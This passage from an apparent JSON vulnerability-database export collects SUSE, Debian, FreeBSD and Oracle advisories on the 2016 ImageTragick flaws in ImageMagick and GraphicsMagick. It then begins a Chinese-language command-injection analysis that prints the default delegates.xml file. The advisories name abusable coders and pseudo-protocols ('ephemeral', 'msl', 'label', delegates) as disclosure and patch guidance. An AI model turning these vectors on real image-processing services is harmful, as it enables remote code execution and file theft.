"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:40:16", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "description": "This update for ImageMagick fixes the following issues:\n\n Security issues fixed:\n - Several coders were vulnerable to remote code execution attacks, these\n coders have now been disabled by default but can be re-enabled by\n editing \"/etc/ImageMagick-*/policy.xml\" (bsc#978061)\n - CVE-2016-3714: Insufficient shell characters filtering leads to\n (potentially remote) code execution\n - CVE-2016-3715: Possible file deletion by using ImageMagick's 'ephemeral'\n pseudo protocol which deletes files after reading.\n - CVE-2016-3716: Possible file moving by using ImageMagick's 'msl' pseudo\n protocol with any extension in any folder.\n - CVE-2016-3717: Possible local file read by using ImageMagick's 'label'\n pseudo protocol to get content of the files from the server.\n - CVE-2016-3718: Possible Server Side Request Forgery (SSRF) to make HTTP\n GET or FTP request.\n\n Bugs fixed:\n - Use external svg loader (rsvg)\n\n This update was imported from the SUSE:SLE-12:Update update project.\n\n", "edition": 1, "modified": "2016-05-07T18:07:43", "published": "2016-05-07T18:07:43", "id": "OPENSUSE-SU-2016:1266-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00028.html", "type": "suse", "title": "Security update for ImageMagick (important)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:31:51", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "description": "This update for ImageMagick fixes the following issues:\n\n The update disables various insecure coders [boo#978061] These fix issues\n tracked in CVE-2016-3714, CVE-2016-3715, CVE-2016-3716, 
CVE-2016-3717,\n CVE-2016-3718\n\n", "edition": 1, "modified": "2016-05-07T14:07:41", "published": "2016-05-07T14:07:41", "id": "OPENSUSE-SU-2016:1261-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00025.html", "title": "Security update for ImageMagick (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:35:06", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "description": "This update for ImageMagick fixes the following issues:\n\n Security issues fixed:\n - Several coders were vulnerable to remote code execution attacks, these\n coders have now been disabled by default but can be re-enabled by\n editing \"/etc/ImageMagick-*/policy.xml\" (bsc#978061)\n - CVE-2016-3714: Insufficient shell characters filtering leads to\n (potentially remote) code execution\n - CVE-2016-3715: Possible file deletion by using ImageMagick's 'ephemeral'\n pseudo protocol which deletes files after reading.\n - CVE-2016-3716: Possible file moving by using ImageMagick's 'msl' pseudo\n protocol with any extension in any folder.\n - CVE-2016-3717: Possible local file read by using ImageMagick's 'label'\n pseudo protocol to get content of the files from the server.\n - CVE-2016-3718: Possible Server Side Request Forgery (SSRF) to make HTTP\n GET or FTP request.\n\n Bugs fixed:\n - Use external svg loader (rsvg)\n\n", "edition": 1, "modified": "2016-05-07T13:08:32", "published": "2016-05-07T13:08:32", "id": "SUSE-SU-2016:1260-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00024.html", "title": "Security update for ImageMagick (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:42:50", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3715", "CVE-2016-3714", 
"CVE-2016-3718", "CVE-2016-3717"], "description": "This update for GraphicsMagick fixes the following issues:\n\n Security issues fixed:\n - Multiple security issues in GraphicsMagick/ImageMagick [boo#978061]\n (CVE-2016-3714, CVE-2016-3718, CVE-2016-3715, CVE-2016-3717)\n\n", "edition": 1, "modified": "2016-05-18T14:08:13", "published": "2016-05-18T14:08:13", "id": "OPENSUSE-SU-2016:1326-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00051.html", "type": "suse", "title": "Security update for GraphicsMagick (important)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:46:33", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3714"], "description": "This update for ImageMagick fixes the following issues:\n\n - bsc#978061: A vulnerability in ImageMagick's \"https\" module allowed\n users to execute arbitrary shell commands on the host performing the\n image conversion. The issue had the potential for remote command\n injection. 
This update mitigates the vulnerability by disabling all\n access to the \"https\" module in the \"delegates.xml\" config file.\n (CVE-2016-3714)\n\n", "edition": 1, "modified": "2016-05-13T20:08:08", "published": "2016-05-13T20:08:08", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00041.html", "id": "SUSE-SU-2016:1301-1", "type": "suse", "title": "Security update for ImageMagick (important)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2019-05-30T02:22:15", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "description": "Package : imagemagick\nVersion : 8:6.7.7.10-5+deb7u5\nCVE ID : CVE-2016-3714 CVE-2016-3715 CVE-2016-3716 CVE-2016-3717 \n CVE-2016-3718\nDebian Bug : 823542\n\nNikolay Ermishkin from the Mail.Ru Security Team and Stewie discovered\nseveral vulnerabilities in ImageMagick, a program suite for image\nmanipulation. These vulnerabilities, collectively known as ImageTragick,\nare the consequence of lack of sanitization of untrusted input. An\nattacker with control on the image input could, with the privileges of\nthe user running the application, execute code (CVE-2016-3714), make\nHTTP GET or FTP requests (CVE-2016-3718), or delete (CVE-2016-3715),\nmove (CVE-2016-3716), or read (CVE-2016-3717) local files.\n\nThese vulnerabilities are particularly critical if Imagemagick processes\nimages coming from remote parties, such as part of a web service.\n\nThe update disables the vulnerable coders (EPHEMERAL, URL, MVG, MSL, and\nPLT) and indirect reads via /etc/ImageMagick/policy.xml file. 
In\naddition, we introduce extra preventions, including some sanitization\nfor input filenames in http/https delegates, the full remotion of\nPLT/Gnuplot decoder, and the need of explicit reference in the filename\nfor the insecure coders.\n\nFor the wheezy, these problems have been fixed in version\n8:6.7.7.10-5+deb7u5.\n\nWe recommend that you upgrade your imagemagick packages.\n- -- \nBrian May <bam@debian.org>\n", "edition": 3, "modified": "2016-05-23T02:35:03", "published": "2016-05-23T02:35:03", "id": "DEBIAN:DLA-486-1:42FF7", "href": "https://lists.debian.org/debian-lts-announce/2016/debian-lts-announce-201605/msg00039.html", "title": "[SECURITY] [DLA 486-1] imagemagick security update", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-12T01:05:36", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3580-1 security@debian.org\nhttps://www.debian.org/security/ Luciano Bello\nMay 16, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : imagemagick\nCVE ID : CVE-2016-3714 CVE-2016-3715 CVE-2016-3716 CVE-2016-3717 \n CVE-2016-3718\nDebian Bug : 823542\n\nNikolay Ermishkin from the Mail.Ru Security Team and Stewie discovered\nseveral vulnerabilities in ImageMagick, a program suite for image\nmanipulation. These vulnerabilities, collectively known as ImageTragick,\nare the consequence of lack of sanitization of untrusted input. 
An\nattacker with control on the image input could, with the privileges of\nthe user running the application, execute code (CVE-2016-3714), make HTTP\nGET or FTP requests (CVE-2016-3718), or delete (CVE-2016-3715), move\n(CVE-2016-3716), or read (CVE-2016-3717) local files.\n\nThese vulnerabilities are particularly critical if Imagemagick processes\nimages coming from remote parties, such as part of a web service.\n\nThe update disables the vulnerable coders (EPHEMERAL, URL, MVG, MSL, and\nPLT) and indirect reads via /etc/ImageMagick-6/policy.xml file. In\naddition, we introduce extra preventions, including some sanitization for\ninput filenames in http/https delegates, the full remotion of PLT/Gnuplot\ndecoder, and the need of explicit reference in the filename for the\ninsecure coders.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 8:6.8.9.9-5+deb8u2.\n\nWe recommend that you upgrade your imagemagick packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 6, "modified": "2016-05-16T17:37:29", "published": "2016-05-16T17:37:29", "id": "DEBIAN:DSA-3580-1:70B04", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2016/msg00157.html", "title": "[SECURITY] [DSA 3580-1] imagemagick security update", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-12T00:52:19", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3715", "CVE-2016-2317", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2015-8808", "CVE-2016-3717", "CVE-2016-2318"], "description": "Version : 1.3.16-1.1+deb7u1\nCVE ID : CVE-2015-8808 CVE-2016-2317 CVE-2016-2318\n\t\t CVE-2016-3714 CVE-2016-3715 CVE-2016-3716\n CVE-2016-3717 CVE-2016-3718\nDebian Bug : 814732\n\nSeveral 
security vulnerabilities were discovered in graphicsmagick, a\ntool to manipulate image files.\n\nGraphicsMagick is a fork of ImageMagick and also affected by\nvulnerabilities collectively known as ImageTragick, that are the\nconsequence of lack of sanitization of untrusted input. An attacker\nwith control on the image input could, with the privileges of the user\nrunning the application, execute code (CVE-2016-3714), make HTTP GET\nor FTP requests (CVE-2016-3718), or delete (CVE-2016-3715), move\n(CVE-2016-3716), or read (CVE-2016-3717) local files.\n\nTo address these concerns the following changes have been made:\n\n1. Remove automatic detection/execution of MVG based on file header or\n file extension.\n\n2. Remove the ability to cause an input file to be deleted based on a\n filename specification.\n\n3. Improve the safety of delegates.mgk by removing gnuplot support,\n removing manual page support, and by adding -dSAFER to all\n ghostscript invocations.\n\n4. Sanity check the MVG image primitive filename argument to assure\n that \"magick:\" prefix strings will not be interpreted. Please note\n that this patch will break intentional uses of magick prefix\n strings in MVG and so some MVG scripts may fail. 
We will search\n for a more flexible solution.\n\nIn addition the following issues have been fixed:\n\nCVE-2015-8808\n Assure that GIF decoder does not use uninitialized data and cause an\n out-of-bound read.\n\nCVE-2016-2317 and CVE-2016-2318\n Vulnerabilities that allow to read or write outside memory bounds\n (heap, stack) as well as some null-pointer dereferences to cause a\n denial of service when parsing SVG files.\n\nFor Debian 7 \"Wheezy\", these problems have been fixed in version\n1.3.16-1.1+deb7u1.\n\nWe recommend that you upgrade your graphicsmagick packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 9, "modified": "2016-05-21T18:52:25", "published": "2016-05-21T18:52:25", "id": "DEBIAN:DLA-484-1:5CC12", "href": "https://lists.debian.org/debian-lts-announce/2016/debian-lts-announce-201605/msg00037.html", "title": "[SECURITY] [DLA 484-1] graphicsmagick security update", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-11T01:29:04", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3715", "CVE-2016-8683", "CVE-2016-2317", "CVE-2016-7997", "CVE-2016-7996", "CVE-2016-3714", "CVE-2016-9830", "CVE-2016-8684", "CVE-2015-8808", "CVE-2016-7800", "CVE-2016-5240", "CVE-2016-2318", "CVE-2016-8682", "CVE-2016-5118"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3746-1 security@debian.org\nhttps://www.debian.org/security/ Luciano Bello\nDecember 24, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : graphicsmagick\nCVE ID : CVE-2015-8808 CVE-2016-2317 CVE-2016-2318 CVE-2016-3714\n CVE-2016-3715 CVE-2016-5118 CVE-2016-5240 CVE-2016-7800\n CVE-2016-7996 CVE-2016-7997 CVE-2016-8682 CVE-2016-8683\n CVE-2016-8684 
CVE-2016-9830\nDebian Bug : 814732 825800 847055\n\nSeveral vulnerabilities have been discovered in GraphicsMagick, a\ncollection of image processing tools, which can cause denial of service\nattacks, remote file deletion, and remote command execution.\n\nThis security update removes the full support of PLT/Gnuplot decoder to\nprevent Gnuplot-shell based shell exploits for fixing the CVE-2016-3714\nvulnerability.\n\nThe undocumented \"TMP\" magick prefix no longer removes the argument file\nafter it has been read for fixing the CVE-2016-3715 vulnerability. Since\nthe \"TMP\" feature was originally implemented, GraphicsMagick added a\ntemporary file management subsystem which assures that temporary files\nare removed so this feature is not needed.\n\nRemove support for reading input from a shell command, or writing output\nto a shell command, by prefixing the specified filename (containing the\ncommand) with a '|' for fixing the CVE-2016-5118 vulnerability.\n\nCVE-2015-8808\n\n Gustavo Grieco discovered an out of bound read in the parsing of GIF\n files which may cause denial of service.\n\nCVE-2016-2317\n\n Gustavo Grieco discovered a stack buffer overflow and two heap buffer\n overflows while processing SVG images which may cause denial of service.\n\nCVE-2016-2318\n\n Gustavo Grieco discovered several segmentation faults while processing\n SVG images which may cause denial of service.\n\nCVE-2016-5240\n\n Gustavo Grieco discovered an endless loop problem caused by negative\n stroke-dasharray arguments while parsing SVG files which may cause\n denial of service.\n\nCVE-2016-7800\n\n Marco Grassi discovered an unsigned underflow leading to heap overflow\n when parsing 8BIM chunk often attached to JPG files which may cause\n denial of service.\n\nCVE-2016-7996\n\n Moshe Kaplan discovered that there is no check that the provided\n colormap is not larger than 256 entries in the WPG reader which may\n cause denial of service.\n\nCVE-2016-7997\n\n Moshe Kaplan discovered 
that an assertion is thrown for some files in\n the WPG reader due to a logic error which may cause denial of service.\n\nCVE-2016-8682\n\n Agostino Sarubbo of Gentoo discovered a stack buffer read overflow\n while reading the SCT header which may cause denial of service.\n\nCVE-2016-8683\n\n Agostino Sarubbo of Gentoo discovered a memory allocation failure in the\n PCX coder which may cause denial of service.\n\nCVE-2016-8684\n\n Agostino Sarubbo of Gentoo discovered a memory allocation failure in the\n SGI coder which may cause denial of service.\n\nCVE-2016-9830\n\n Agostino Sarubbo of Gentoo discovered a memory allocation failure in\n MagickRealloc() function which may cause denial of service.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 1.3.20-3+deb8u2.\n\nFor the testing distribution (stretch), these problems (with the\nexception of CVE-2016-9830) have been fixed in version 1.3.25-5.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.3.25-6.\n\nWe recommend that you upgrade your graphicsmagick packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 10, "modified": "2016-12-24T22:03:46", "published": "2016-12-24T22:03:46", "id": "DEBIAN:DSA-3746-1:A9B4D", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2016/msg00330.html", "title": "[SECURITY] [DSA 3746-1] graphicsmagick security update", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-11T01:29:42", "bulletinFamily": "unix", "cvelist": ["CVE-2017-13063", "CVE-2017-17915", "CVE-2017-17502", "CVE-2017-17498", "CVE-2017-14314", "CVE-2017-11636", "CVE-2017-17782", "CVE-2016-3716", "CVE-2017-17503", "CVE-2017-11643", "CVE-2016-5241", 
"CVE-2016-7447", "CVE-2017-17500", "CVE-2016-3718", "CVE-2017-13065", "CVE-2017-13134", "CVE-2016-7448", "CVE-2016-3717", "CVE-2017-16353", "CVE-2017-16669", "CVE-2017-14733", "CVE-2017-12937", "CVE-2017-17501", "CVE-2017-13064", "CVE-2017-17912", "CVE-2016-7446", "CVE-2016-7449"], "description": "Package : graphicsmagick\nVersion : 1.3.20-3+deb8u3\nCVE ID : CVE-2016-3716 CVE-2016-3717 CVE-2016-3718 CVE-2016-5241\n CVE-2016-7446 CVE-2016-7447 CVE-2016-7448 CVE-2016-7449\n CVE-2017-11636 CVE-2017-11643 CVE-2017-12937\n CVE-2017-13063 CVE-2017-13064 CVE-2017-13065\n CVE-2017-13134 CVE-2017-14314 CVE-2017-14733\n CVE-2017-16353 CVE-2017-16669 CVE-2017-17498\n CVE-2017-17500 CVE-2017-17501 CVE-2017-17502\n CVE-2017-17503 CVE-2017-17782 CVE-2017-17912\n CVE-2017-17915\nDebian Bug : 870149 870157 872574 873130 873129 873119 873099 881524\n 881391 884905\n\nVarious security issues were discovered in Graphicsmagick, a collection\nof image processing tools. Heap-based buffer overflows or overreads may\nlead to a denial of service or disclosure of in-memory information or\nother unspecified impact by processing a malformed image file.\n\nFor Debian 8 \"Jessie\", these problems have been fixed in version\n1.3.20-3+deb8u3.\n\nWe recommend that you upgrade your graphicsmagick packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 10, "modified": "2018-06-27T21:28:53", "published": "2018-06-27T21:28:53", "id": "DEBIAN:DLA-1401-1:A41C0", "href": "https://lists.debian.org/debian-lts-announce/2018/debian-lts-announce-201806/msg00009.html", "title": "[SECURITY] [DLA 1401-1] graphicsmagick security update", "type": "debian", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "freebsd": [{"lastseen": "2019-05-29T18:32:43", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", 
"CVE-2016-3718", "CVE-2016-3717"], "description": "\nOpenwall reports:\n\nInsufficient filtering for filename passed to delegate's command\n\t allows remote code execution during conversion of several file\n\t formats. Any service which uses ImageMagick to process user\n\t supplied images and uses default delegates.xml / policy.xml,\n\t may be vulnerable to this issue.\nIt is possible to make ImageMagick perform a HTTP GET or FTP\n\t request\nIt is possible to delete files by using ImageMagick's 'ephemeral'\n\t pseudo protocol which deletes files after reading.\nIt is possible to move image files to file with any extension\n\t in any folder by using ImageMagick's 'msl' pseudo protocol.\n\t msl.txt and image.gif should exist in known location - /tmp/\n\t for PoC (in real life it may be web service written in PHP,\n\t which allows to upload raw txt files and process images with\n\t ImageMagick).\nIt is possible to get content of the files from the server\n\t by using ImageMagick's 'label' pseudo protocol.\n\n", "edition": 4, "modified": "2016-05-07T00:00:00", "published": "2016-05-03T00:00:00", "id": "0D724B05-687F-4527-9C03-AF34D3B094EC", "href": "https://vuxml.freebsd.org/freebsd/0d724b05-687f-4527-9c03-af34d3b094ec.html", "title": "ImageMagick -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:35:26", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-3718", "CVE-2016-3717"], "description": "[6.7.2.7-4]\n- Add fix for CVE-2016-3714, CVE-2016-3715, CVE-2016-3716 and CVE-2016-3717", "edition": 4, "modified": "2016-05-09T00:00:00", "published": "2016-05-09T00:00:00", "id": "ELSA-2016-0726", "href": "http://linux.oracle.com/errata/ELSA-2016-0726.html", "title": "ImageMagick security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-22T17:06:33", 
"bulletinFamily": "unix", "cvelist": ["CVE-2016-3715", "CVE-2015-8896", "CVE-2015-8895", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-5239", "CVE-2015-8897", "CVE-2016-3717", "CVE-2016-5240", "CVE-2015-8898", "CVE-2016-5118"], "description": "[6.7.2.7-5]\n- Add fix for CVE-2016-3714, CVE-2016-3715, CVE-2016-3716 and CVE-2016-3717", "edition": 5, "modified": "2016-06-16T00:00:00", "published": "2016-06-16T00:00:00", "id": "ELSA-2016-1237", "href": "http://linux.oracle.com/errata/ELSA-2016-1237.html", "title": "ImageMagick security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T12:12:00", "description": "\u8be6\u60c5\u6765\u6e90\uff1a[CVE-2016-3714 - ImageMagick \u547d\u4ee4\u6267\u884c\u5206\u6790 - \u4e4c\u4e91\u77e5\u8bc6\u5e93](http://drops.wooyun.org/papers/15589)\r\n\r\nImageMagick\u662f\u4e00\u6b3e\u4f7f\u7528\u91cf\u5f88\u5e7f\u7684\u56fe\u7247\u5904\u7406\u7a0b\u5e8f\uff0c\u5f88\u591a\u5382\u5546\u90fd\u8c03\u7528\u4e86\u8fd9\u4e2a\u7a0b\u5e8f\u8fdb\u884c\u56fe\u7247\u5904\u7406\uff0c\u5305\u62ec\u56fe\u7247\u7684\u4f38\u7f29\u3001\u5207\u5272\u3001\u6c34\u5370\u3001\u683c\u5f0f\u8f6c\u6362\u7b49\u7b49\u3002\u4f46\u8fd1\u6765\u6709\u7814\u7a76\u8005\u53d1\u73b0\uff0c\u5f53\u7528\u6237\u4f20\u5165\u4e00\u4e2a\u5305\u542b\u300e\u7578\u5f62\u5185\u5bb9\u300f\u7684\u56fe\u7247\u7684\u65f6\u5019\uff0c\u5c31\u6709\u53ef\u80fd\u89e6\u53d1\u547d\u4ee4\u6ce8\u5165\u6f0f\u6d1e\u3002\r\n\r\n\u56fd\u5916\u7684\u5b89\u5168\u4eba\u5458\u4e3a\u6b64\u65b0\u5efa\u4e86\u4e00\u4e2a\u7f51\u7ad9\uff1a https://imagetragick.com/ 
\uff0c\u4e0d\u5f97\u4e0d\u8bf4\uff0c\u6709\u4e9b\u5916\u56fd\u4eba\u86ee\u4f1a\u73a9\u7684\u3002\r\n\r\n\u76f8\u5bf9\u4e8e\u4e4b\u524d\u7684\u6570\u4e2a\u62e5\u6709\u300e\u4e3b\u9875\u300f\u7684\u6f0f\u6d1e\uff0c\u8fd9\u4e2a\u6d1e\u786e\u5b9e\u4e0d\u4e00\u822c\uff0c\u786e\u5b9e\u662f\u4e00\u4e2a\u53ef\u4ee5\u88ab\u5229\u7528\u7684\u597d\u6d1e\uff0c\u4e4c\u4e91\u4e3b\u7ad9\u4e0a\u4e5f\u7206\u51fa\u4e86\u6570\u4e2a\u88ab\u8be5\u6f0f\u6d1e\u5f71\u54cd\u7684\u5927\u5382\u5546\u3002\u6211\u4eec\u5148\u6765\u5206\u6790\u4e00\u4e0b\u5b83\u51fa\u73b0\u7684\u539f\u56e0\u3002\r\n\r\n### 0x01 \u539f\u7406\u5206\u6790\r\n\u4e0e\u8fd9\u4e2a\u6f0f\u6d1e\u76f8\u5173\u7684CVE\u6709CVE-2016-3714\u3001CVE-2016-3715\u3001CVE-2016-3716\u3001CVE-2016-3717\uff0c\u5176\u4e2d\u6700\u4e25\u91cd\u7684\u5c31\u662fCVE-2016-3714\uff0c\u5229\u7528\u8fd9\u4e2a\u6f0f\u6d1e\u53ef\u4ee5\u9020\u6210\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u7684\u5371\u5bb3\u3002\r\n\r\nImageMagick\u6709\u4e00\u4e2a\u529f\u80fd\u53eb\u505adelegate\uff08\u59d4\u6258\uff09\uff0c\u4f5c\u7528\u662f\u8c03\u7528\u5916\u90e8\u7684lib\u6765\u5904\u7406\u6587\u4ef6\u3002\u800c\u8c03\u7528\u5916\u90e8lib\u7684\u8fc7\u7a0b\u662f\u4f7f\u7528\u7cfb\u7edf\u7684system\u547d\u4ee4\u6765\u6267\u884c\u7684\uff08 https://github.com/ImageMagick/ImageMagick/blob/e93e339c0a44cec16c08d78241f7aa3754485004/MagickCore/delegate.c#L347 \uff09\r\n\r\n\u6211\u4eec\u5728ImageMagick\u7684\u9ed8\u8ba4\u914d\u7f6e\u6587\u4ef6\u91cc\u53ef\u4ee5\u770b\u5230\u6240\u6709\u7684\u59d4\u6258\uff1a /etc/ImageMagick/delegates.xml\r\n\r\n```\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<!DOCTYPE delegatemap [\r\n<!ELEMENT delegatemap (delegate)+>\r\n<!ELEMENT delegate (#PCDATA)>\r\n<!ATTLIST delegate decode CDATA #IMPLIED>\r\n<!ATTLIST delegate encode CDATA #IMPLIED>\r\n<!ATTLIST delegate mode CDATA #IMPLIED>\r\n<!ATTLIST delegate spawn CDATA #IMPLIED>\r\n<!ATTLIST delegate stealth CDATA #IMPLIED>\r\n<!ATTLIST delegate thread-support CDATA 
#IMPLIED>\r\n<!ATTLIST delegate command CDATA #REQUIRED>\r\n]>\r\n<!--\r\n Delegate command file.\r\n \r\n Commands which specify\r\n \r\n decode=\"in_format\" encode=\"out_format\"\r\n \r\n specify the rules for converting from in_format to out_format These\r\n rules may be used to translate directly between formats.\r\n \r\n Commands which specify only\r\n \r\n decode=\"in_format\"\r\n \r\n specify the rules for converting from in_format to some format that\r\n ImageMagick will automatically recognize. These rules are used to\r\n decode formats.\r\n \r\n Commands which specify only\r\n \r\n encode=\"out_format\"\r\n \r\n specify the rules for an \"encoder\" which may accept any input format.\r\n \r\n For delegates other than ps:*, pcl:*, and mpeg:* the substitution rules are\r\n as follows:\r\n \r\n %i input image filename\r\n %o output image filename\r\n %u unique temporary filename\r\n %Z unique temporary filename\r\n %# input image signature\r\n %b image file size\r\n %c input image comment\r\n %g image geometry\r\n %h image rows (height)\r\n %k input image number colors\r\n %l image label\r\n %m input image format\r\n %p page number\r\n %q input image depth\r\n %s scene number\r\n %w image columns (width)\r\n %x input image x resolution\r\n %y input image y resolution\r\n \r\n Set option delegate:bimodal=true to process bimodal delegates otherwise they\r\n are ignored.\r\n \r\n If stealth=\"True\" the delegate is not listed in user requested\r\n \"-list delegate\" listings. These are typically special internal delegates.\r\n \r\n If spawn=\"True\" ImageMagick will not way for the delegate to finish,\r\n nor will it read any output image. 
It will only wait for either the input\r\n file to be removed (See \"ephemeral:\" coder) indicating that the input file\r\n has been read, or a maximum time limit of 2 seconds.\r\n-->\r\n<delegatemap>\r\n <delegate decode=\"autotrace\" stealth=\"True\" command=\""convert" "%i" "pnm:%u"\\n"autotrace" -input-format pnm -output-format svg -output-file "%o" "%u"\"/>\r\n <delegate decode=\"blender\" command=\""blender" -b "%i" -F PNG -o "%o""\\n"convert" -concatenate "%o*.png" "%o"\"/>\r\n <delegate decode=\"browse\" stealth=\"True\" spawn=\"True\" command=\""xdg-open" http://www.imagemagick.org/; rm "%i"\"/>\r\n <delegate decode=\"cdr\" command=\""uniconvertor" "%i" "%o.svg"; mv "%o.svg" "%o"\"/>\r\n <delegate decode=\"cgm\" thread-support=\"False\" command=\""ralcgm" -d ps -oC < "%i" > "%o" 2> "%Z"\"/>\r\n <delegate decode=\"dvi\" command=\""dvips" -q -o "%o" "%i"\"/>\r\n <delegate decode=\"dng:decode\" command=\""ufraw-batch" --silent --create-id=also --out-type=png --out-depth=16 "--output=%u.png" "%i"\"/>\r\n <delegate decode=\"dot\" command='"dot" -Tsvg "%i" -o "%o"' />\r\n <delegate decode=\"edit\" stealth=\"True\" command=\""/etc/alternatives/x-terminal-emulator" -title "Edit Image Comment" -e vi "%o"\"/>\r\n <delegate decode=\"eps\" encode=\"pdf\" mode=\"bi\" command=\""gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 "-sDEVICE=pdfwrite" "-sOutputFile=%o" "-f%i"\"/>\r\n <delegate decode=\"eps\" encode=\"ps\" mode=\"bi\" command=\""gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=nodevice" "-sOutputFile=%o" "-f%i"\"/>\r\n <delegate decode=\"fig\" command=\""fig2dev" -L ps "%i" "%o"\"/>\r\n <delegate decode=\"plt\" command=\""echo" "set size 1.25,0.62; set terminal postscript portrait color solid; set output \\'%o\\'; load \\'%i\\'" > "%u";"gnuplot" "%u"\"/>\r\n <delegate decode=\"hpg\" command=\""hp2xx" -q -m eps -f `basename "%o"` "%i"; mv -f `basename "%o"` "%o"\"/>\r\n 
